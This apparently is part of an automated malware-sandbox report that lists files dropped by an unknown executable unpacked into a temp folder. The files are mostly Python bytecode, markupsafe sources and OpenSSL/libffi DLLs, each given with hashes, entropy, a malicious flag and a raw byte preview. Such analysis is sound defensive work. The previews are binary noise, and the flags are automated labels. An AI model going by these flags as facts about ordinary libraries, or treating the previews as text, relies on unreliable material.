                                                                                                                                            Preview:...........d.7.............................d.d.l.m.Z.m.Z.m.Z.....G.d...d.e.j.......................Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z.d.d...Z.d.S.)......)...grammar..token..tokenizec...........................e.Z.d.Z.d.S.)...PgenGrammarN)...__name__..__module__..__qualname__........XC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\lib2to3\pgen2\pgen.pyr....r........s..................Dr....r....c.....................~.....e.Z.d.Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d...Z.d...Z.d.S.)...ParserGeneratorNc.....................N.....d.}.|...t...........|.d.................}.|.j.........}.|.|._.........|.|._.........t...........j.........|.j.......................|._.........|.......................................|.....................................\...|._.........|._.........|.....|.................i.|._.........|.......................................d.S.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\lib2to3\pgen2\token.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2410
                                                                                                                                            Entropy (8bit):5.694492292276809
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:jAWUvLlPBJMNA2Bt0Dqf1ja6JQmvCJfu+QvlfeUI:8WMR5yNIDq9ZJQ9JfQtf0
                                                                                                                                            MD5:8AE84D32071A3F24FFA35E7AF38E1D1E
                                                                                                                                            SHA1:43867C7CA71F11388B7879D1956B964989D411D7
                                                                                                                                            SHA-256:46EFE033DC501DE3719984ADD3BE750A35E660E479C2BF67677B126E5FDB34B7
                                                                                                                                            SHA-512:C9A2914A8356D244B8D71474D13866FA049D6C1CBF291CA53185CD7318FAE0136922D5568FF92971CEB9DB895AA99C60A3020FE87A6C6E680C9B0E76153B664A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........dl..............................d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d Z d!Z!d"Z"d#Z#d$Z$d%Z%d&Z&d'Z'd(Z(d)Z)d*Z*d+Z+d,Z,d-Z-d.Z.d/Z/d0Z0d1Z1d2Z2d3Z3d4Z4d5Z5d6Z6d7Z7d8Z8d9Z9d:Z:d;Z;d<Z<d=Z=d>Z>i.Z?..e@..eA...............B................................................D.] \...ZCZD..eEeD................eEd...............u.r.eCe?eD<....!d?..ZFd@..ZGdA..ZHdBS.)Cz!Token constants (from "token.h").................................................................................................................................................................. ....!...."....#....$....%....&....'....(....)....*....+....,....-........./....0....1....2....3....4....5....6....7....8....9....:....;....<........c...........................|.t...........k.....S...N....NT_OFFSET....xs.... .YC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\lib2to3\pgen2\token.py..ISTERMINALrG...O...s.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\lib2to3\pgen2\tokenize.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):24194
                                                                                                                                            Entropy (8bit):5.864898441596555
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:pHVAMYSI6BYlHdcQF4Q9rxtV6Xme3LOAKLaZpBplYD1nTnC+5wGW/n:5jpBkbq0ttV6F3LOAKLaZrplYRpW/n
                                                                                                                                            MD5:0FCC07E87E393576B9AFD527C0739A8C
                                                                                                                                            SHA1:CEC680AA8380B3C7B21893653010F0C2FD23959A
                                                                                                                                            SHA-256:965BE4F250BA0DFDFB94BAC9ECF412E9C1ECBE1DBD820F50B31BCA213CECF7EE
                                                                                                                                            SHA-512:A410DC512B3EF5F9BB32AEAC76B65B6B8F51458576E17E207A197C9894A52D3ECE4C2DAB50E0F460D954382B7679FC3BCB7EA299744BDF089D674729C7CDFBF3
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........d.T........................P.....d.Z.d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.T.d.d.l.m.Z...d.....e.e...............D...............g.d...z...Z.[...e...n.#.e.$.r...e.Z.Y.n.w.x.Y.w.d...Z.d...Z.d...Z.d...Z.d.Z.d.Z.e...e.d.e.z.................z.....e.e...............z...Z.d.Z.d.Z.d.Z.d.Z...e.d.d...............Z...e.e.e.e.e...............Z.d.Z...e.d.d.................e.e...............z...Z.d.e.z...Z...e.e.e...............Z ..e.d.e d.z.................Z!..e.e!e e...............Z"d.Z#d.Z$d Z%d!Z&d"Z'..e.e'd#z...e'd$z.................Z(..e.e'd%z...e'd&z.................Z)..e.d'd(d)d*d+d,d-d.d/..............Z*d0Z+..e.d1d2d3..............Z,..e.e*e+e,..............Z-..e.e"e-e)e...............Z.e.e.z...Z/..e.e'd4z.....e.d5d...............z...e'd6z.....e.d7d...............z.................Z0..e.d.e.e(..............Z1e...e.e1e"e-e0e...............z...Z2..e3e.j4........e/e2e%e&f...............\...Z5Z6Z7Z8..e.d8d9d:d;................e.d8d9d<d=..............z...h.d>..z...Z9..e.j4....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\lib2to3\pygram.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2101
                                                                                                                                            Entropy (8bit):5.451031828642836
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:NBccnt8nTgh5/YCU8x2b7AyViloMPF19zvvv8G+FK:DpwT45gCUXrwzvvv84
                                                                                                                                            MD5:BF52C67858FAFA2943C544AB73FE57D9
                                                                                                                                            SHA1:969475E7F57921635E2875F870FD6CA2A4A7C76E
                                                                                                                                            SHA-256:E86D025AA3FB79AD5E982C6CE563BE7989CE7AE86B6AEBBF7D87E7897C7D8406
                                                                                                                                            SHA-512:68A0D384AE1C0588A40F0D6373D7FF7939B4C1C023A22334805468B77EC1AD6694D1EDCAA9EF5A691C340659A1850BAAC135CC68173FE00173A79B47FD46A63C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........dD...............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j...............................e.j...............................e...............d...............Z.e.j...............................e.j...............................e...............d...............Z...G.d...d.e...............Z...e.j.........d.e...............Z...e.e...............Z.e.....................................Z.e.j.........d.=.e.....................................Z.e.j.........d.=...e.j.........d.e...............Z...e.e...............Z.d.S.).z&Export the Python grammar and symbols......N.....)...token)...driver)...pytreez.Grammar.txtz.PatternGrammar.txtc...........................e.Z.d.Z.d...Z.d.S.)...Symbolsc.....................f.....|.j.............................................D.].\...}.}.t...........|.|.|...................d.S.).z.Initializer... Creates an attribute for each grammar symbol (nonterminal),. whose value is the symbol's type (an int >= 256)..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\lib2to3\pytree.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):37028
                                                                                                                                            Entropy (8bit):5.307371882747333
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:BVl2oHtcPz/7dGFIVP6mIKVKGDrHXpewJMrwv7tlZ:vl2iKPz/5GFIZngGDrHXQ147tlZ
                                                                                                                                            MD5:2920D52DA91F1031574C476CEFD66703
                                                                                                                                            SHA1:A36DA8CA3860578A874DF6DE70F7C4F7726247CD
                                                                                                                                            SHA-256:BE574E554418F73DB746E8840A5238717CEE8C51E4F4DF376FEA67BF0EA6BA5B
                                                                                                                                            SHA-512:A345A25F85D3724BE0ACA8580C801A83C4A2E2AE08CE5B6F7A70A337785660D868B540CB78AE56A2B0E7152CDC72B824160016E934B9D9F19B9D2FA01C25443A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........d.p..............................d.Z.d.Z.d.d.l.Z.d.d.l.m.Z...d.Z.i.a.d...Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z.d...Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z.d...Z.d.S.).z..Python parse tree definitions...This is a very concrete parse tree; we need to keep every token and.even the comments and whitespace between tokens...There's also a pattern matching implementation here..z#Guido van Rossum <guido@python.org>.....N)...StringIOi....c...........................t...........sGd.d.l.m.}...|.j.............................................D.]'\...}.}.t...........|...............t...........k.....r.|.t...........|.<....(t.................................|.|...............S.).N.....)...python_symbols)..._type_reprs..pygramr......__dict__..items..type..int..setdefault)...type_numr......name..vals.... .TC:\Users\Administrator\AppData\Loca

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\lib2to3\refactor.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):38557
                                                                                                                                            Entropy (8bit):5.364931817219707
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:wy/mNFyfDbtYXmUOU0mFsAa5CrGTc+YpKsjR:z/WFyfDKXEUXOCaRYpKst
                                                                                                                                            MD5:79DF6CAE49435D2028BE01D68F78C88C
                                                                                                                                            SHA1:D9E98ED2026D6FCAC8E039537813A2B8E9CCBDCE
                                                                                                                                            SHA-256:ECAAAA45EF5A91D9FBB353E9892941B01AAE8B36F07064A3E9A6EE781492776B
                                                                                                                                            SHA-512:254B48E56346A17940716C452030F81D9BEAEB896D583EF61A08804F6B8E5B2A5924610DE2AD1DF04CA5C4A70CBC6DB5430D7A3E48533085E35F76C0981401E4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........dOn........................@.....d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d...Z...G.d...d.e...............Z.d...Z.d...Z.d...Z.d...Z.d...Z...G.d...d.e...............Z...G.d...d.e...............Z ..G.d...d.e...............Z!..G.d...d.e ..............Z"d.S.).z.Refactoring framework...Used as a main program, this can refactor any number of files and/or.recursively descend down directories. Imported as a module, this.provides infrastructure to write your own refactoring tool..z#Guido van Rossum <guido@python.org>.....N)...chain.....)...driver..tokenize..token)...find_root)...pytree..pygram)...btm_matcherTc...........................t...........|.g.g.d.g...............}.g.}.t...........j.........|.j.......................D.]<\...}.}.}.|.......................d...............r!|.r.|.d.d.............}.|.......................|..................=|.S.).zEReturn a sorted list of all availa

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\lib2to3\tests\data\README

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):410
                                                                                                                                            Entropy (8bit):4.5454567271237485
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:/hFIAMVZmIX9IAMVZmI48x9Or9C3hEzSuyxXzh:pnIXvIVx9M7nCDh
                                                                                                                                            MD5:D3D39C73DE677A4415097DD577E1097A
                                                                                                                                            SHA1:7B7EFC962D4F92A2373764DF46AA94F4DCE5EFC3
                                                                                                                                            SHA-256:B7442A0D467C1BC14706408CDB44109DF70728AD4472E1FB0B60947A053752F1
                                                                                                                                            SHA-512:96F1E080D24A78BE52E38FD72E245B21C035EC35F7DAC416E69A3C0AADE920BA9E99C73AE146603AA4435F7A12FA577D56717EC6395C763DDC9266A976F8CCAB
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:In this directory:..- py2_test_grammar.py -- test file that exercises most/all of Python 2.x's grammar...- py3_test_grammar.py -- test file that exercises most/all of Python 3.x's grammar...- infinite_recursion.py -- test file that causes lib2to3's faster recursive pattern matching.. scheme to fail, but passes when lib2to3 falls back to iterative pattern matching...- fixes/ -- for use by test_refactor.py..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\libcrypto-1_1.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3445016
                                                                                                                                            Entropy (8bit):6.099467326309974
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:98304:+/+YgEQaGDoWS04ki7x+QRsZ51CPwDv3uFfJx:MLgEXGUZ37x+VZ51CPwDv3uFfJx
                                                                                                                                            MD5:E94733523BCD9A1FB6AC47E10A267287
                                                                                                                                            SHA1:94033B405386D04C75FFE6A424B9814B75C608AC
                                                                                                                                            SHA-256:F20EB4EFD8647B5273FDAAFCEB8CCB2B8BA5329665878E01986CBFC1E6832C44
                                                                                                                                            SHA-512:07DD0EB86498497E693DA0F9DD08DE5B7B09052A2D6754CFBC2AA260E7F56790E6C0A968875F7803CB735609B1E9B9C91A91B84913059C561BFFED5AB2CBB29F
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........).h.z.h.z.h.z..Oz.h.z...{.h.z...{.h.z...{.h.z...{.h.z.h.zjh.z...{.h.z=..{.h.z=..{.j.z=..{.h.z=.#z.h.z=..{.h.zRich.h.z........................PE..d.....wd.........." ..."..$...................................................5......o5...`..........................................y/..h...J4.@.....4.|....p2......b4../....4..O..P.,.8.............................,.@............@4..............................text...$.$.......$................. ..`.rdata........$.......$.............@..@.data...!z....1..,....1.............@....pdata..h....p2.......1.............@..@.idata..^#...@4..$....3.............@..@.00cfg..u....p4.......3.............@..@.rsrc...|.....4.......3.............@..@.reloc...y....4..z....3.............@..B................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\libffi-8.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):39696
                                                                                                                                            Entropy (8bit):6.641880464695502
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                                                                                                            MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                                                                                                            SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                                                                                                            SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                                                                                                            SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\library.zip

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2017526
                                                                                                                                            Entropy (8bit):7.995017502931782
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:49152:w26oY3iOj5KgrB0EPuXCRlrnY6FjRrEWlnDs6:w26ogiq5zB0valrntjRP
                                                                                                                                            MD5:81310C2E4DC284FE2839C3B6160B6CF3
                                                                                                                                            SHA1:1E3DE9F964C1480963F206EDA458DA07F74A3A1E
                                                                                                                                            SHA-256:5F990863A345515F7EEFC68C50E59E76A2FB278073B45365DB4E7A79D8672F76
                                                                                                                                            SHA-512:9B24D03F151E852362F6A1A2AA999E007DC5001E0BDC1806873C00DA21BDEFD80CE988552360BAFBA9C289672EBDA25E287064302DFB94992A753FD7A7E8434E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:PK.........a$Z...i...........BUILD_CONSTANTS.pyc[......O~W.?.. ...P................................W.....i.g.kn.m..W.l.gT%.W.XT.``..`d`d.`hdehbeh.C.....+'3I.$9.B......25.o.;.z...;..D.y.{....x........\}\..].C.<..aZB<}].C.}.n.....9.".p.8...x:.9.E....W2|.../Wg.......G._O?.:.......................T.|.............b..._.6..).9.vE<. .........o..5....k.!.s.A.../.w.A...T...^....,.E..PK.........0.V.q..P...^.......__future__.pyc.X.o....~I.J..(.;..-.4mY.m.IQY.S.4.........!..r..]..:...9.V.@...\.../._..9...z...KN}o._".&E...r~...{.....I...o....w.....O........a.H....+.....c..~.(.X..d.b...G.hq...a6V.cRQb..q6Q........k?!_.;..'..O.)6.......H.Ef.,.. S.2.<4.L..< #..L...G..Y.Y....2.E.....,.%.. ....V...r.EV....@..Z...S~?BH...`.,.ZE.8...T3T.ZSl.P.TW.r])s.V..[IIJ)j....f..].d....D..+v].R..C....ct.fk...9.sX...1.X1.b..o.5s.g...t...J...1IzV.'..N(.~..Z.u....iW."8....^.%...{..*.....S.,0)kF.l......x....$..w..z.U.......-e....?m/&.Hg.56.1m;.;8...\*....L.I*..b

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\libssl-1_1.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):704792
                                                                                                                                            Entropy (8bit):5.55753143710539
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:ihO7/rNKmrouK/POt6h+7ToRLgo479dQwwLOpWW/dQ0T9qwfU2lvzA:iis/POtrzbLp5dQ0T9qcU2lvzA
                                                                                                                                            MD5:25BDE25D332383D1228B2E66A4CB9F3E
                                                                                                                                            SHA1:CD5B9C3DD6AAB470D445E3956708A324E93A9160
                                                                                                                                            SHA-256:C8F7237E7040A73C2BEA567ACC9CEC373AADD48654AAAC6122416E160F08CA13
                                                                                                                                            SHA-512:CA2F2139BB456799C9F98EF8D89FD7C09D1972FA5DD8FC01B14B7AF00BF8D2C2175FB2C0C41E49A6DAF540E67943AAD338E33C1556FD6040EF06E0F25BFA88FA
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........q...q...q.....q..p...q..p...q..t...q..u...q..r...q.[.p...q...p.u.q.[.u...q.[.q...q.[.....q.[.s...q.Rich..q.........................PE..d.....wd.........." ...".D...T......<.....................................................`..........................................A...N..@U..........s........N......./......h.......8...............................@............@..@............................text....B.......D.................. ..`.rdata.../...`...0...H..............@..@.data...AM.......D...x..............@....pdata...V.......X..................@..@.idata..%W...@...X..................@..@.00cfg..u............l..............@..@.rsrc...s............n..............@..@.reloc..q............v..............@..B................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\logging\__init__.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):98921
                                                                                                                                            Entropy (8bit):5.3311725343259795
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:9LXtwiUIzh+LD8L1aN6tTI6naxV6YC0rXgl2PqqV4sAAUL5L6/29HEO1DdmQ02sr:RtwqheD8Lo9z9rXgUCL/9uonDdpv4x
                                                                                                                                            MD5:1E23F51A08B0D77DF46FE07D7F3B7E3B
                                                                                                                                            SHA1:0F8CF7CA9D6F3533B8E593630F654DD369222A87
                                                                                                                                            SHA-256:56E33847CF331447887B784A15FF64E3CD04C4814A4223F986A77953C393E788
                                                                                                                                            SHA-512:4FA24098CBB6F2B13B2557A857650BE1E7809E5E5F0A73CAE0D704568A3B1BCE90A2745EC40AC608DF028C8EB1EDDB2D63CB3F1687E5793DE6D79D8B0C8D4928
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........d.D..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.d.d.l.Z.d.Z.d.Z.d.Z.d.Z...e.j.......................Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.Z.d.Z.d.Z.e.Z d.Z!d.Z"d.Z#e.d.e.d.e.d.e!d.e"d.e#d.i.Z$e.e.e.e.e.e!e"e#d...Z%d...Z&d...Z'd...Z(..e)e.d...............r.d...Z*n.d...Z*e.j+.........,....................e(j-........j.......................Z/d...Z0d...Z1..e.j2......................Z3d ..Z4d!..Z5..e)e.d"..............s.d#..Z6n(..e.j7......................Z8d$..Z6d%..Z9..e.j:........e4e9e5.&..................G.d'..d(e;..............Z<e<a=d)..Z>d*..Z?d+..Z@..e...............ZA[...G.d,..d-e;..............ZB..G.d...d/eB..............ZC..G.d0..d1eB..............ZDd2ZEeBeEf.eCd3f.eDd4f.d5..ZF..G.d6..d7e;..............Z...e...............ZG..G.d8..d9e;..............ZH..G.d:..d;e;..............ZI..G.d<..d=e;..............ZJ..e.jK......................ZLg.ZMd>..ZNd?..ZO..G.d@..dAeJ..............ZP

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\markupsafe\__init__.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):20049
                                                                                                                                            Entropy (8bit):5.229807783038389
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:BseMvUfYySnWF98Vpz0q16OgVV0qWAHzJaRRRR602dFLgpR9Y:BGUfYyWWF9G4OgvsKoRRRR6HdFLgb9Y
                                                                                                                                            MD5:D5CD93320E0ADE72C22943ABC380D70B
                                                                                                                                            SHA1:1C0F5B4C5DFA4249C9C189FC138D4D18CAE27341
                                                                                                                                            SHA-256:FA1E86B883AB6DDDA7B7E9CC73F5525D0F96E1DF482614652A4898FB8F4001BF
                                                                                                                                            SHA-512:6AB4600062611516F0B59424F6E1BBCD9BEB15AA724132591BF2A77E418FEE3CB9D40135C7034C5CD766D5EE89BC00FCE2E220EECFAC3188F7BAD43D69E54FED
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:........Vr.e.,..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.........r'd.d.l.Z...G.d...d.e.j.......................Z...e.j.........d...............Z.d.Z.d.d...Z...G.d...d.e...............Z...G.d...d.e.j.......................Z...e.j.........d.e.e...............Z.d.e.d.e.j.........e.j...................d.e.j.........e.j.........g.e.f...........d.e.f.d...Z...G.d...d...............Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.S.#.e.$.r...d.d.l m.Z...d.d.l m.Z...d.d.l m.Z...Y.d.S.w.x.Y.w.)......Nc...........................e.Z.d.Z.d.e.f.d...Z.d.S.)...HasHTML..returnc...........................d.S...N......selfs.... .gC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\markupsafe\__init__.py..__html__z.HasHTML.__html__....s..........D.....N)...__name__..__module__..__qualname__..strr....r....r....r....r....r........s/...................c..............................r....r......_Pz.2.1.5..func..t.Callable[_P, str]r......t.Callable[_P, Markup]c....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\markupsafe\_native.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2759
                                                                                                                                            Entropy (8bit):5.294040380656551
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:YCFVgUZR9HaEoX291dk5TKSW5saSzvbhLeJs+l9vuKpE:xFj9Vos7PNaaSzzhLey+A
                                                                                                                                            MD5:00E4308B12DB64EB3CB296E3CEDF0D2B
                                                                                                                                            SHA1:524C336F6582DEC5FE9A0F7490276142D83C1DBA
                                                                                                                                            SHA-256:9A1F4970AAC5CAA1BC97D14DF87197919BC76406422868FF9EB4295411BEC591
                                                                                                                                            SHA-512:244E7F443DB69320BDD8C1F801363B196341B558A1E3D8D8CFCE108BCE1A80F39C7C007E6F50C6A36A5FB7C3E4962523F9E6B7A5A78DBE27DC1E2DB59CB3F022
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:........Vr.e..........................~.....d.d.l.Z.d.d.l.m.Z...d.e.j.........d.e.f.d...Z.d.e.j.........e.j...................d.e.f.d...Z.d.e.j.........d.e.f.d...Z.d.S.)......N.....)...Markup..s..returnc.....................d.....t...........|.d...............r!t...........|...................................................S.t...........t...........|.....................................d.d.....................................d.d.....................................d.d.....................................d.d.....................................d.d.............................S.).a....Replace the characters ``&``, ``<``, ``>``, ``'``, and ``"`` in. the string with HTML-safe sequences. Use this if you need to display. text that might contain such characters in HTML... If the object has an ``__html__`` method, it is called and the. return value is assumed to already be safe for HTML... :param s: An object to be converted to a string and escaped.. :return: A :class:`Marku

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\markupsafe\_speedups.c

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7403
                                                                                                                                            Entropy (8bit):5.448882153677679
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:kUkOo7lroaaERRE4KEJYEQiEqU2MfcybJ3klqYi8EK7KcwrjamESZFoCGL0XqE:k7mEnEXEmE3EqBMt6qYiXcwim/ZFxG3E
                                                                                                                                            MD5:EE415CF46EB4954EFA3277A13B31859C
                                                                                                                                            SHA1:21C3C62A60926365ABC85141AF8AEF2E26DB1FCB
                                                                                                                                            SHA-256:9F78F3CDA2705DCA0DF274C5C80E777F7BD2AAC58ADAFBA323EBFA41889F8E14
                                                                                                                                            SHA-512:D3EF1B28BA70539FCA58AA994A219C750034AB963F00A114A0F565F65BD490D372C0BFD23346F15D1FCB64F4F6978A6D957AABFBF9336E40BD00C9A54FC58EA2
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:#include <Python.h>....static PyObject* markup;....static int..init_constants(void)..{...PyObject *module;...../* import markup type so that we can mark the return value */...module = PyImport_ImportModule("markupsafe");...if (!module)....return 0;...markup = PyObject_GetAttrString(module, "Markup");...Py_DECREF(module);.....return 1;..}....#define GET_DELTA(inp, inp_end, delta) \...while (inp < inp_end) { \....switch (*inp++) { \....case '"': \....case '\'': \....case '&': \.....delta += 4; \.....break; \....case '<': \....case '>': \.....delta += 3; \.....break; \....} \...}....#define DO_ESCAPE(inp, inp_end, outp) \...{ \....Py_ssize_t ncopy = 0; \....while (inp < inp_end) { \.....switch (*inp) { \.....case '"': \......memcpy(outp, inp-ncopy, sizeof(*outp)*ncopy); \......outp += ncopy; ncopy = 0; \......*outp++ = '&'; \......*outp++ = '#'; \......*outp++ = '3'; \......*outp++ = '4'; \......*outp++ = ';'; \......break; \.....case '\'': \......memcpy(outp, inp-ncopy, sizeof(*outp)*nco

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\markupsafe\_speedups.cp311-win_amd64.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15872
                                                                                                                                            Entropy (8bit):5.2050934917752825
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:OtwEX3IfwEA1RwEaCjEUHsMV38w5Yk/pxggRSea1DvH5TCIcqgr:b27CsVB/pxkDvZTCMgr
                                                                                                                                            MD5:F9A048E8B523E5BC3C240862815DACEC
                                                                                                                                            SHA1:E33E530B9F6C2AC4E4982CC9FA91DDA10C5C4AF7
                                                                                                                                            SHA-256:304AA793204E1E6B2DC10AF9D212A2B68BC78EB1E1309D20626C9AE05BB50CAD
